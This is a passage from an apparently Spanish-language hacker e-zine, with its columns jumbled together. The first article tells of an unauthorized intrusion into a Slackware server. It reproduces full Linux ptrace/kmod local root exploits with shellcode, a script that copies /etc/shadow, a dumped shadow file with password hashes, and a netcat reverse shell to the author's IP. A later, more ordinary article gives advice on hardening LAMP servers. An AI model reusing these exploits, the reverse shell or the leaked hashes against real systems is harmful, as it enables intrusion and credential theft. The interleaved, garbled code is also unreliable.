-rw-r--r-- 1 root root 0 May 12 1994 at.deny :(k-mil!~Jason@202.155.38.120) boleh join nggak ~Mon Oct 14 01:53:52 victim = child + 1;
:(Guest37621!~afdafa@194.79.106.220) hai ass wr wb ~Mon Oct 14 07:07:26
-rw-r--r-- 1 root root 899 Aug 19 1999 atalkd.conf :(CapLock!~cabe@212.122.228.9) haiiiiiiiiii ~Mon Oct 14 16:04:58 signal(SIGCHLD, sigchld);
-rw-r--r-- 1 root root 2512 Oct 11 1999 bootptab :(Vika!~puffded@202.149.81.30) salamu'alaykum ~Mon Oct 14 18:06:21
-rw-r--r-- 1 root root 0 Feb 15 1994 csh.cshrc :(Lavidania!~user@202.155.116.183) halo.. ~Mon Oct 14 18:06:25 do
-rw-r--r-- 1 root root 1672 Jun 3 2000 csh.login :(Lavidania!~user@202.155.116.183) boleh aku minta tolong enggak ~Mon Oct 14 err = ptrace(PTRACE_ATTACH, victim, 0, 0);
18:19:39 :(muslim_har!~hfranbest@202.150.85.26) assalamualaikum wr.wb ~Mon while (err == -1 && errno == ESRCH);
drwxr-xr-x 2 root root 4096 May 19 1994 default Oct 14 18:53:17 :(jeuneurob!shafeec@62.139.4.87) alo ~Mon Oct 14 18:53:22
-rwx------ 1 root root 6054 Jun 9 2000 dhclient-script :(jeuneurob!shafeec@62.139.4.87) assalamu'alaiku8m ~Mon Oct 14 18:53:24 if (err == -1)
-rw-r--r-- 1 root root 84 Jun 9 2000 dhclient.conf :(jeuneurob!shafeec@62.139.4.87) maaf yaa ~Mon Oct 14 18:53:33
fatal("[-] Unable to attach");
drwxr-xr-x 2 root root 4096 Jun 9 2000 dhcpc :(jeuneurob!shafeec@62.139.4.87) u alumni man 1 yaa? ~Mon Oct 14 20:24:01
:(tasz!~user_id@202.155.89.102) hi ~Mon Oct 14 22:19:47
... :(duren!lastamasta@212.103.166.10) assalamu'alaikum ~Mon Oct 14 23:24:28 fprintf(stderr, "[+] Attached to %d\n", victim);
Líneas y líneas --> Omitiendo... :(kikoko!~ffagih@202.154.62.233) assalamu'alaikum ~Tue Oct 15 00:31:50 while (!gotchild) ;
... :(tombo_ati!...@ip88-133.cbn.net.id) assalamu'alaikum warohmatullah ~Tue Oct if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
-rw-r--r-- 1 root root 365 Jun 12 2000 securetty 15 00:41:02 :(citra!~n@202.59.196.202) salamu'alaykum fatal("[-] Unable to setup syscall trace");
<-- fprintf(stderr, "[+] Waiting for signal\n");
-rw-r--r-- 1 root root 2948 Jun 27 2000 serial.conf
-rw-r--r-- 1 root root 5924 Oct 14 1997 services for(;;);
-rw------- 1 root root 772 Mar 11 02:50 shadow }
-rw------- 1 root root 772 Feb 23 23:21 shadow-
-rw-rw-rw-
drwxr-xr-x
1
2
root root 68 Oct 29 2001 shells
root root 4096 Dec 5 1995 skel
Por algunos archivos medios sospechos y delata- void do_parent(char * progname)
{
-rw-r--r--
drwxr-xr-x
1
2
root root 6 May 13 2000 slackware-version
root root 4096 Jun 9 2000 slip
dores que encontré por alli; puedo intuir que este struct
int
stat
err;
st;

-rw-r--r-- 1 root root 8783 May 13 2000 smb.conf-sample errno = 0;


-rw-r--r-- 1 root root 833 Jun 9 2000 snooptab servidor ya ha sido visitado antes por algun otro socket(AF_SECURITY, SOCK_STREAM, 1);
do {
drwxr-xr-x 2 root root 4096 Oct 19 19:22 ssh
-rw------- 1 root root 512 Mar 12 09:04 ssh_random_seed tipo. :P err = stat(progname, &st);
} while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);
-r--r----- 1 root root 294 Jun 18 2000 sudoers
drwxr-xr-x 3 root root 4096 Oct 19 19:23 sysconfig if (err == -1)
fatal("[-] Unable to stat myself");
-rw-r----- 1 root root 619 May 25 1998 syslog.conf
drwxr-xr-x 2 dwong users 4096 Mar 30 2001 tcpwrap_msg Bien, ahora el objetivo es alcanzar los maximos alarm(0);
-rw-r--r-- 1 root root 7881 Sep 5 1999 termcap system(progname);
-rw-r--r-- 1 root root 629474 Jul 30 1999 termcap-BSD privilegios. Gracias a mi amigo ‘runlevel’; públicos }
drwxr-xr-x 2 root root 4096 Mar 4 1998 tin
drwxr-xr-x 2 root root 4096 Oct 8 1999 vga agradecimientos para él tambien; :) me comunicó void prepare(void)
{
-rw-r--r-- 1 root root 3313 Aug 19 1999 wgetrc if (geteuid() == 0) {
-rw-r--r-- 1 root root 147 Jun 9 2000 yp.conf.example de un exploit que recientemente salió a la luz; por initgroups("root",
setgid(0);
0);
lrwxrwxrwx 1 root root 7 Mar 22 2001 zprofile -> profile
setuid(0);
<-- aquel entonces; es el siguiente: execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
fatal("[-] Unable to spawn shell");
}
}
-->
Aquí nos percatamos que se trata de una Distribu- /* int main(int argc, char ** argv)
* Linux kernel ptrace/kmod local root exploit {
cion Linux Slackware. Buena distro obviamente, *
* This code exploits a race condition in kernel/kmod.c, which creates
prepare();
signal(SIGALRM, sigalrm);
pero como todo; sín una adecuada administración; * kernel thread in insecure manner. This bug allows to ptrace cloned
* process, allowing to take control over privileged modprobe binary.
alarm(10);

* parent = getpid();
cualquier sistema es vulnerable a estos tipos de * Should work under all current 2.2.x and 2.4.x kernels.
*
child = fork();
victim = child + 1;

acciones. * I discovered this stupid bug independently on January 25, 2003, that
* is (almost) two month before it was fixed and published by Red Hat if (child == -1)
* and others. fatal("[-] Unable to fork");
*
* Wojciech Purczynski <cliph@isec.pl> if (child == 0)
do_child();
Mirando un poco en los direcctorias del sistema, *
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
else
do_parent(argv[0]);
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
me encuentro con los siguientes archivos: * return 0;
* (c) 2003 Copyright by iSEC Security Research }
*/ <--

/tmp/_xvt_txt
/tmp/_xvt_txt/pekok.tar.gz Lo probe, compiló bien.. :) Pero tengo una shell
ciega y lo que quiero es una shell interactiva. Con-

Lo que hagas en la vida, tendrá eco en la eternidad. 19


S E C U R I T Y W A R I P R O J E C T S

sultando con mi amigo ‘Shadown’, me habló sobre memcpy(tgt,"\xC1\xE0\x08", 3); tgt+=3; n+=3;
Hmmmmm... pienso... :) Si ejecuta binarios como
if(pid & 0xff){

un telnet inverso. Leer tambien antigos numeros tgt[0]=0xB0;


tgt+=2;
tgt[1]=pid;
n+=2; lo dice el propio exploit, pues deducción simple;
}
de RareGaZz para más detalles. tgt[0]=0x89;
return n+2;
tgt[1]=0xC7;
me creo un script simple, con verso ;). Algo
}
}
como:
void mkcode(unsigned short pid)
Ahora bien, como es posible subir files al server, {
int i=0;
Oooohhh!
unsigned char *c=shcode;
pues el netcat es una buena opción para conseguir c+=pidcode(c, pid);
strcpy(c, ptrace_code);
c[53]=(sizeof(execve_code)+strlen(bin)+4)/4;
una shell normal. Agradesco a ‘Shadown’ por strcat(c, execve_code);
strcat(c, bin);
#!/bin/bash
}
compilarme estáticamente el ‘nc’, no se porque en //------------------------
echo “copiando shadow...”
mi box, me tiraba error ;). void hack(int pid)
{
cat /etc/shadow >> PATH/ver
int i;
Bueno, entonces no era posible en una primera struct user_regs_struct r;
char b1[100]; struct stat st;
echo “copiado.”
instancia realizar conecciones entrantes, pues los int len=strlen(shcode);

if(kill(pid, 0)) return;

puertos que utilizaba, se encontraban filtrados por sprintf(b1, "/proc/%d/exe", pid); Listo!!! Aquí está...
if(stat(b1, &st)) return;

la maquina remota. Diantres!. Ahora bien, se trato if(st.st_ino!=me.st_ino || st.st_dev!=me.st_dev) return;


-->
lo inverso, es decir que me expanda un shell en mi if(ptrace(PTRACE_ATTACH, pid, 0, 0)) return;
while(ptrace(PTRACE_GETREGS, pid, NULL, &r)); root:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0:::::
fprintf(stderr, "\033[1;33m+ %d\033[0m\n", pid); bin:*:9797:0:::::
maquina. if(ptrace(PTRACE_SYSCALL, pid, 0, 0)) goto fail;
daemon:*:9797:0:::::
adm:*:9797:0:::::
while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
lp:*:9797:0:::::
for (i=0; i<=len; i+=4) sync:*:9797:0:::::
if(ptrace(PTRACE_POKETEXT, pid, r.eip+i, *(int*)(shcode+i))) goto fail;
shutdown:*:9797:0:::::
Local Host: nc -l -nvv -p 5000 kill(chldpid, 9); halt:*:9797:0:::::
ptrace(PTRACE_DETACH, pid, 0, 0); mail:*:9797:0:::::
Remote Host: nc -n MI_IP 5000 -e /bin/bash fprintf(stderr, "\033[1;32m- %d ok!\033[0m\n", pid);
news:*:9797:0:::::
if(mode==M_DOUBLE){ uucp:*:9797:0:::::
char commands[1024]; operator:*:9797:0:::::
char * c=commands;
kill(hackpid, SIGCONT); games:*:9797:0:::::
Pues.. na... al único puerto que me permitía sprintf(commands, "\nexport TERM='%s'\nreset\nid\n",
while(*c) { ioctl(0, TIOCSTI, c++); }
getenv("TERM")); ftp:*:9797:0:::::
gdm:*:9797:0:::::
conectarme la máquina remota era a mi propio waitpid(hackpid,
}
0, 0); nobody:*:9797:0:::::
dwong:$1$3NZyPSF2$2VO7nReTKGN5Y9PftBX1j/:12122:0:99999:7:::
puerto 80, ya ocupado por nuestro conocido exit(0);
mysql:$1$2DIuivNW$5/35UzOTWcOdaPvqRFcuX.:11404:0:99999:7:::
webmaster:$1$qcRvrUzR$U9Y5LepV0STQewAdD6FkA/:11624:0:99999:7:::
toor:$1$12/Juu6R$riwwt6ZQcX4fKyynY3eZq1:11438:0:99999:7:::
apache. ;) fail:
ptrace(PTRACE_DETACH, pid, 0, 0); jchong:$1$DE/x6fuY$OWWC0qFyQMm7d9XdbG5f1/:11871:0:99999:7:::
kill(pid, SIGCONT);
} kayluss:$1$dWpxKneU$plRq15DL8/qtO9Z8414yW0:11914:0:99999:7:::
eponte:$1$0hXuyKVe$Qxbdcg/erYBLpPkHNodC0.:12107:0:99999:7:::
void usage(char * cmd)
<--
Bien, nuevamente con ‘runlevel’. Conversamos {
fprintf(stderr, "Usage: %s [-d] [-b] [-r] [-s] [-c executable]\n"
"\t-d\t-- use double-ptrace method (to run interactive programs)\n"
"\t-b\t-- start bindshell on port 4112\n"
sobre un nuevo exploit que enlaza una shell a un "\t-r\t-- support randomized pids\n"
"\t-c\t-- choose executable to start\n"

puerto. Pero; detalle importante; tambien per-


"\t-s\t-- single-shot mode - abort if unsuccessful at the first try\n", cmd);
exit(0); root? ]:) Entonces con ésto podemos ya realizar
}

mite ejecutar binarios. Trate con un simple ls, int main(int ac, char ** av, char ** env) casi cualquier acción, habiendo conseguido los
{

pero redirigia la salida a /dev/tty. Aqui esta el


int single=0;
char c; privilegios absolutos, solo la imaginación y el
int mypid=getpid();

exploit, en cuestion:
fprintf(stderr, "Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>\n\n");
if(stat("/proc/self/exe", &me) && stat(av[0], &me)){ tiempo son el límite. Cambiarle el index nueva-
perror("stat(myself)");
return
}
0;
mente cruzo mi mente, pero como le comente a mi
-->
/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
* 2.2 and 2.4
while((c=getopt(ac, av, "sbdrc:"))!=EOF)
case 'd': mode=M_DOUBLE; break;
switch(c) {
amigo ‘Angel Protector’, esto no tiene mucho
case 'b': mode=M_BIND; break;
*
* have fun
*/
case 'r': randpids=1; break;
case 'c': bin=optarg; break; sentido, y ya no tengo ganas o no me nace hacer
case 's': single=1; break;
#define ANY_SUID "/usr/bin/passwd"
default:
}
usage(av[0]);
esas cosas ahora.
#include <stdio.h> if(ac!=optind) usage(av[0]);
#include <string.h>
#include <stdlib.h> if(!bin){
#include <unistd.h>
#include
#include
<sys/ptrace.h>
<linux/user.h>
if(mode!=M_SIMPLE)
else{
bin="/bin/sh";
Ademas ya me canseEEE!... :)
struct stat qpa;
#include <signal.h> if(stat((bin="/bin/id"), &qpa)) bin="/usr/bin/id";
#include <fcntl.h> }
#include <sys/wait.h> }
#include
#include
#include
<sys/stat.h>
<asm/ioctls.h>
<getopt.h>
signal(SIGUSR1, synch); Unas Notas
hackpid=0;
// user settings: switch(mode){
case M_SIMPLE:

• Como apreciaron, no se realizo ningun daño al


int randpids=0; fprintf(stderr, "=> Simple mode, executing %s > /dev/tty\n", bin);
strcpy(shcode, execve_tty_code);
#define M_SIMPLE 0 strcat(shcode, bin);
#define
#define
M_DOUBLE
M_BIND
1
2
break;

case M_DOUBLE:
sistema. Se reconoce el acceso no permitido.
int mode=M_SIMPLE;
char * bin=NULL;
fprintf(stderr, "=> Double-ptrace mode, executing %s, suid-helper %s\n",
bin, ANY_SUID);
if((hackpid=fork())==0){
Pero ya alguien habia estado allí antes; parece
struct stat me;
int chldpid;
char *ble[]={ANY_SUID, NULL};
fprintf(stderr, "Starting suid program %s\n", ANY_SUID);
kill(getppid(), SIGUSR1);
ser que no alcanzo mayores privilegios o lo hizo
int hackpid;

// flags
execve(ble[0],
kill(getppid(),
ble,
9);
perror("execve(SUID)");
env);
muy bien. ;)
int sf=0;
int u2=0; _exit(0);
}
void killed(int a) { u2=1; }
while(!sf);
void synch(int x){ sf=1; }

// shellcode to inject usleep(100000);


• Se pone de manifiesto una vez más; que el
kill(hackpid, SIGSTOP);
unsigned char shcode[1024];
mkcode(hackpid);
break;
descuido en la seguridad de un sistema; de-
char ptrace_code[]="\x31\xc0\xb0\x1a\x31\xdb\xb3\x10\x89\xf9"
"\xcd\x80\x85\xc0\x75\x41\xb0\x72\x89\xfb\x31\xc9\x31\xd2\x31\xf6"
"\xcd\x80\x31\xc0\xb0\x1a\x31\xdb\xb3\x03\x89\xf9\xb2\x30\x89\xe6"
case M_BIND:
fprintf(stderr, "=> portbind mode, executing %s on port 4112\n", bin);
pende mucho del administrador del mismo o
"\xcd\x80\x8b\x14\x24\xeb\x36\x5d\x31\xc0\xb0\xFF\x89\xc7\x83\xc5"
"\xfc\x8b\x75\x04\x31\xc0\xb0\x1a\xb3\x04\xcd\x80\x4f\x83\xed\xfc"
"\x83\xea\xfc\x85\xff\x75\xea\x31\xc0\xb0\x1a\x31\xdb\xb3\x11\x31"
strcpy(shcode,
strcat(shcode,
bind_code);
bin);
del personal encargado del mantenimiento de
"\xd2\x31\xf6\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xc5\xff"
break;
"\xff\xff"; }
fprintf(stderr, "sizeof(shellcode)=%d\n", strlen(shcode));
este.
char execve_tty_code[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68"
"\x2f\x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\xb0\x05\x31\xc9\x66" signal(SIGUSR2, killed);
"\xb9\x41\x04\x31\xd2\x66\xba\xa4\x01\xcd\x80\x89\xc3\x31\xc0\xb0"
"\x3f\x31\xc9\xb1\x01\xcd\x80\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54"
"\x24\x04\x5b\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8"
if(randpids){
fprintf(stderr, "\033[1;31m"
"Randomized pids support enabled... be patient or load the system heavily,\n"
• Como tambien notan; toda la informacion
"\xe8\xff\xff\xff";

char execve_code[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\xb0\x46"
"this method does more brute-forcing\033[0m\n");
} requerida, como exploits o documentos, codes,
"\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80"
"\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
again:
sf=0;
if((chldpid=fork())==0){
shells y herramientas, son de libre distribucion
char bind_code[]= int q;
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
"\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
kill(getppid(),
while(!sf);
SIGUSR1); en internet. Cualquiera con un poco de tiempo y
"\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
"\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
"\xec\x31\xc0\x50\x66\xb8\x10\x10\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
fprintf(stderr, "=> Child process
for(q=0;q<10;++q){
started"); conocimientos puede realizar acciones como
"\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83" fprintf(stderr, ".");
"\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
"\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
socket(22,0,0);
}
esta.
"\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74" fprintf(stderr, "\n");
"\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd" kill(getppid(), SIGUSR2);
"\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31" _exit(0);
"\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31" }
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";
while(!sf);
kill(chldpid, SIGUSR1);
• Pase un buen rato pensando y aprendiendo un
// generate shellcode that sets %edi to pid for(;;){ poco mas sobre esto. ;)
int q;
int pidcode(unsigned char * tgt, unsigned short pid) if(randpids){
{ for(q=1;q<30000;++q)

fprintf(stderr, "pid=%d=0x%08x\n", pid, pid);


if(q!=chldpid
}else{
&& q!=mypid && q!=hackpid)

for(q=chldpid+1;q<chldpid+10;q++)
hack(q);

hack(q);
Agradecimientos Finales
tgt[0]=0x31; tgt[1]=0xff; }
tgt+=2;
if(u2){
if((pid & 0xff) && (pid & 0xff00)){
tgt[0]=0x66; tgt[1]=0xbf;
u2=0;
if(single) break; Por soportar mis preguntas ;)
goto again;
*((unsigned short*)(tgt+2))=pid; }
return 6; }
fprintf(stderr, "Failed\n");
}else{
int n=2;
return 1;
} Shadown: Grande Shadown!, gracias por lo de
if(pid & 0xff00){
// M$ sucks
//
// http://bezkitu.com/
telnet inveso, y shellcodes.
tgt[0]=0xB0; tgt[1]=(pid>>8);
tgt+=2; n+=2;
<--
“Amigo”: Por guiarme en lo de la shell ciega ;)
}
Buanzo: Por un fuck! que no entendi :). Y por el
consejo del script php.

20 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

Runlevel: Por tu time, y los exploits. miento de Internet, muchos servidores web, cor- próximamente será sometido a pruebas de certifi-
alt3kx: Por un poco de time, y info. reo, etc. Que corren sobre Linux. cación de algún estándar.

Y A todo RareGaZz por el apoyo moral!!!... Grande Seguridad en Linux Dentro de las distribuciones que tienen mayor
Rare carajo! popularidad están las siguientes que paso a de-
“Linux no es mas ni menos seguro que Windows u otro scribir y a dar una opinión bastante personal al
Dedicado: S.O, todo depende de cómo se administre y actualice y la respecto:
A mi futura esposa; quien quiera que sea :-). prevención que se tenga para evitar incidentes”
Debian: Excelente distribución muy usada en
varios entornos es bastante versátil y el sistema de
Preparado Originalemente para: Consideraciones generales
administración de paquetes con el que cuenta
Para graficar un poco mas el tema se muestra el
(DEB) y su administrador de dependencias (APT)
siguiente esquema piramidal:
RareGaZz Security Team la hacen una opción bastante viable además que
febrerøMarzo cuenta con una gran comunidad de usuarios y el
ReYDeS 2003 (c) soporte de esta comunidad es muy bueno.

RedHat Enterprise Linux (RHEL): Tiempo de-


spués de la salida de Redhat 9, RedHat anuncio la
discontinuidad de su distribución libre y paso a
Seguridad en servidores *nix LAMP
presentar su solución que cumple con estándares
Escrito por Renkho como el Common Criterial y cuenta con un soporte
comercial, paralelamente RedHat anuncio Fedora,
su distribución para la comunidad que cuenta con
Para los que administran servidores Web con Linux, o
muchos características que tiene o serán agregadas
para los que quieren comenzar a investigar al respecto
en futuro a su distribución comercial RHEL.
como un tema de investigación y aprendizaje, he Descripción
preparado este texto con algunos alcances al respecto de Fedora: En realidad aquí discrepo un poco del uso
cómo minimizar el riesgo a ser victimas de algún ataque En el primer nivel de la base de la pirámide se de esta distribución para entorno de servidores, ya
de los defacers que están a la orden del día. define la seguridad física, quienes tendrán acceso a que Fedora nació como una distribución preview
donde este ubicado el servidor ya sea este algún de la línea de RHEL, Fedora cuenta con tec-
Introducción datacenter u otra instalación. nologías que serán probadas y luego de un periodo
prudencial pasaran a la distribución comercial
En si el tema de la seguridad informática es muy El nivel siguiente se refiere al nivel de seguridad
como algo estable, contando además, a mi parecer
extenso como para explicarlo en un solo articulo y físico del servidor, quienes tendrán acceso a reini-
personal es como una beta del RHEL que para
además este no es el articulo milagroso que dará la ciarlo de manera manual insertar medios de alma-
entornos de desarrollo viene muy bien pero para
receta mágica de todo lo que involucra la seguri- cenamiento externos portátiles como memorias
servidores lo mejor es mirar hacia otra alternativa
dad, al grano tratare de dar a conocer algunos USB, CDs además del acceso a la BIOS caso se
si lo que se va usar es una distribución basada en
conceptos que humildemente manejo y quizás intente reiniciar la PC para bootear desde otro
RPM como clónicos del RHEL sean: CentOS,
puedan ser útiles para ustedes amables lectores, medio y tener acceso al sistema de archivos.
WhiteBox, TaoLinux, etc. Siendo de estos CentOS
para este caso en particular enfocare el articulo a la
El nivel de seguridad nivel sistema operativo, la opción que suelo elegir.
instalación de un servidor LAMP.
encierra todo lo referente a que tiene instalado el
CentOS: Distribución clónica del RHEL, bastante
Definición servidor, con respecto tanto a distribución, versión
difundida y con amplio soporte que tiene además
del kernel y cantidad de paquetes, se recomienda
No esta de más definir ciertos términos bastante con repositorios RPM bastante activos para las
una instalación realmente mínima con un buen
usados y más que nada aclararlos: actualizaciones y el acceso al software necesarios,
gestor de paquetes para instalar lo realmente nece-
una elección bastante interesante con respecto a
sario.
Defaced: Desfiguración de una pagina Web, alinearse con estándares optando por una solución
modificando la página inicial. Generalmente El nivel de seguridad de aplicaciones y servicios es realmente libre, salvo que no se contara con el
muchos lo confunden y lo definen como hackeado concerniente a que va correr sobre el S.O, servidor soporte y respaldo total de RedHat obviamente.
lo cual no guarda relación alguna con el hacking web apache por ejemplo, manejador de base de
Gentoo: Pues si, nombro Gentoo porque última-
ya que es considerando como un acto de vandal- datos MySQL, debidamente configurados y asegu-
mente lo vengo usando en para varios servidores
ismo virtual por algunos. rados.
con los que trabajo y es una distribución que me ah
Llegando al nivel de aplicaciones que corren sobre gustado desde siempre por el nivel de manejo y
Defacer: Persona con conocimientos suficientes
los servicios en el caso del servidor web scripts toma de dediciones de que tener y como tenerlo
para buscar vulnerabilidades publicadas y hacer
PHP, como manejadores de contenidos, clientes de que te da al administrarlo, no es una mala opción
uso de estas para ganar acceso a servidores que
correo web, carritos de compras web, etc. si sabes utilizarlo correctamente.
alojan varias paginas para modificarlas y dejar su
firma de que paso por ahí.
Consideraciones a tomar en cuenta durante la FreeBSD: Así como otros *BSD, es una alternativa
instalación de un servidor Linux bastante viable e interesante su modelo de desar-
Hacking: acto de hackear, en líneas generales es rollo es bastante ordenado en comparación en
una es entender como funcionan las cosas opti- Distribución a usar: Si preguntamos a 3 adminis- Linux y su estabilidad y desempeño es excelente.
mizándolas y llevándolas al límite, abarca desde tradores de red que distribución de Linux re-
comprender el funcionamiento de los sistemas, comiendan podremos obtener 3 respuestas diferen- Con respecto a otras distribuciones no nombradas
mejorarlos, y la capacidad de identificar y solu- tes sustentadas por cada uno de ellos. El que dis- aquí pues no se puede nombrar todas, considere
cionar fallas en los mismos. tribución usar se decide de acuerdo a gustos y a estas distribuciones por selección personal, si la
necesidades, en cuanto a gustos es por la que me- distribución que usted usa aquí no aparece nom-
Linux: Que es Linux en si no es algo que tratare de jor manejamos o con la que llevamos mas tiempo brada no quiere decir que sea una mala opción
explicar pues es algo ya conocido pero en líneas trabajando, y de necesidades en el caso de que se como se comento al inicio depende de cada uno,
generales es un clon de Unix bastante versátil y deba cumplir algún requerimiento como que el solo quise poner esa información como referencial.
estable que se ah vuelto muy popular con el creci- servidor cumpla con diferentes estándares ya que

Lo que hagas en la vida, tendrá eco en la eternidad. 21


S E C U R I T Y W A R I P R O J E C T S

Instalación del S.O: ción de intentos de accesos. Los pasos para generar Reiniciamos el servicio y procedemos a testear lo
Una vez elegida la distribución de Linux una llave SSH son los siguientes: configurado al conectar no debería dejar que in-
a usar se deben tener en cuenta previa- gresemos contraseñas pero si conectamos desde el
Dentro de una Terminal: host donde creamos la llave ssh nos pedirá la con-
mente que esquemas de partición usar,
generalmente se recomienda tener las traseña de la llave: id_dsa una ves ingresada cor-
ssh-keygen -t dsa
siguientes: rectamente se autentificara correctamente.
/ Nos mostrara lo siguiente:
Usuarios, grupos, etc: Revisamos el archivo:
/boot
Generating public/private dsa key pair. /etc/passwd para ver que usuarios existen crea-
/tmp
dos y con acceso a que, procedemos a eliminar
/var Enter file in which to save the key usuarios que no usamos, lo recomendable es apli-
/var/tmp  (/home/root/.ssh/id_dsa): car la shell: false para usuarios que no necesitamos
o queremos que no tengan acceso alguno a la línea
La selección de paquetes a instalar de Nos pregunta donde va generar las llaves ssh co- de comandos de la siguiente manera:
preferencia la mas mínima posible, a la piamos la sugerida y la colocamos o en todo caso
fecha la mayoría de distribuciones cuen- le indicamos algun otro directorio. usuario:x:81:81:usuario de
tan con algún sistema de administración prueba:/home/usuario:/bin/false
de dependencias de paquetes como el Luego nos mostrara lo siguiente:
APT para Debian y portado para dis- Firewall de host: La configuración de un firewall
Created directory ‘/home/root/.ssh’.
tribuciones RPM, YUM para el caso de de host iptables es altamente recomendable aquí
CentOS, up2date para el caso de RHEL, Enter passphrase (empty for no passphrase): una estructura extremadamente basica ojo:
y portage para el caso de Gentoo; que
# aceptar todo local
nos ayudaran para instalar lo que nece- Le indicamos alguna contraseña o podemos de- iptables -A INPUT -s 127.0.0.1 -j ACCEPT

sitemos además de mantener actualiza- jarlo también en blanco, lo recomendable es asig- # aceptar conexiones establecidas
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
dos nuestros servidores. narle una contraseña diferente a la que usamos en iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

el sistema host donde estamos generando estas # ssh / sftp

Consideraciones básicas post- instalación llaves y diferente también a la del servidor a donde
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
# webserver

nos conectaremos. iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
Servicios que se ejecutan por defecto y paquetes #caso apache+ssl
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
adicionales: Se menciono anteriormente el uso de Enter same passphrase again: # bloquear todo lo demas
una instalación realmente mínima pero consid- iptables -A INPUT -j REJECT --reject-with icmp-port-unreachable

erando que suele pasar que algún servicio se nos Confirmamos la contraseña y nos mostrara lo
escapa, debemos deshabilitarlo, en el caso de las siguiente:
distribuciones basadas en redhat podemos usar el Repito es una estructura extremadamente basica.
Your identification has been saved in /home/root/.ssh/id_dsa.
comando: chkconfig, o también el comando ntsysv
que nos mostrara un aplicación en modo consola
Your public key has been saved in /home/root/.ssh/id_dsa.pub. The key fingerprint is:
Kernel: Con respecto al kernel de Linux todo es
3b:df:11:1b:15:2c:03:c0:c3:9e:7e:74:79:e5:d5:cc root@host
donde podremos seleccionar y deseleccionar lo cuestión de elección, podemos recompilarlo para
que indiquemos; en otras distribuciones como eliminar drivers o soporte de cosas que no usamos
Ingresamos al directorio “.ssh” o a la carpeta que para así aligerarlo y reducir el riesgos, en el caso
Debian tenemos el paquete: sysv-rc-conf que po-
se le halla indicado y encontraremos estos dos de RHEL se deben seguir ciertos pasos para usar
demos instalar y nos mostrara que servicios hay y
archivos: las fuentes que provee RedHat, ya que si se esta
en que niveles corren; en el caso de Gentoo tene-
mos la herramienta nativa: rc-update, y para otras pagando a RedHat por el software y el soporte al
id_dsa id_dsa.pub
distribuciones de una manera mas genérica: en el compilar un kernel genérico perdería su garantía
directorio: “/etc/rc.d” se encuentran unos directo- en caso de algún accidente o X problema, pero
Donde “id_dsa” es la llave privada que manten-
rios nombrados según su nivel de ejecución donde existe la opción de hacerlo siguiendo los procedi-
dremos nosotros en la pc o pcs desde donde nos
se encuentran scripts de inicio, que podemos edi- mientos que da RedHat usando el siguiente docu-
conectaremos al servidor, y el archivo:
tar y elegir que cargara al inicio. Por el lado de los mento:
“id_dsa.pub” es la llave publica que colocaremos
paquetes instalados podemos vincularlos con los en los servidores a donde queremos tener acceso
servicios que deshabilitamos y desinstalarlos con via llaves ssh, y lo colocamos dentro del directorio: http://kbase.redhat.com/faq/FAQ_85_8254.shtm
el gestor de paquetes correspondientes a la dis- “.ssh/authorized_hosts” luego procedemos a con- En líneas generales al recompilar un kernel debe-
tribución. figurar el servidor SSH para que acepte esas llaves mos remover opciones que no vamos a usar como
SSH y deniegue el uso de contraseñas para la au- drivers para hardware que no tenemos, soporte
Montado de particiones: Las opciones de montado tentificación. para cosas que no vamos a usar como por ejemplo
de particiones nos permitirán reducir riesgos en sonido, captura de video, periféricos como joy-
nuestro servidor, esto lo podemos definir en el Un ejemplo de un archivo “/etc/ssh/sshd_config” sticks u otros que no tienen sentido que un servi-
/etc/fstab de la siguiente manera: bastante basico: dor tenga instalado soporte para eso.
/dev/sda1
/dev/sda3
/boot
/
ext3
ext3
noauto,noatime 1 2
defaults 0 1
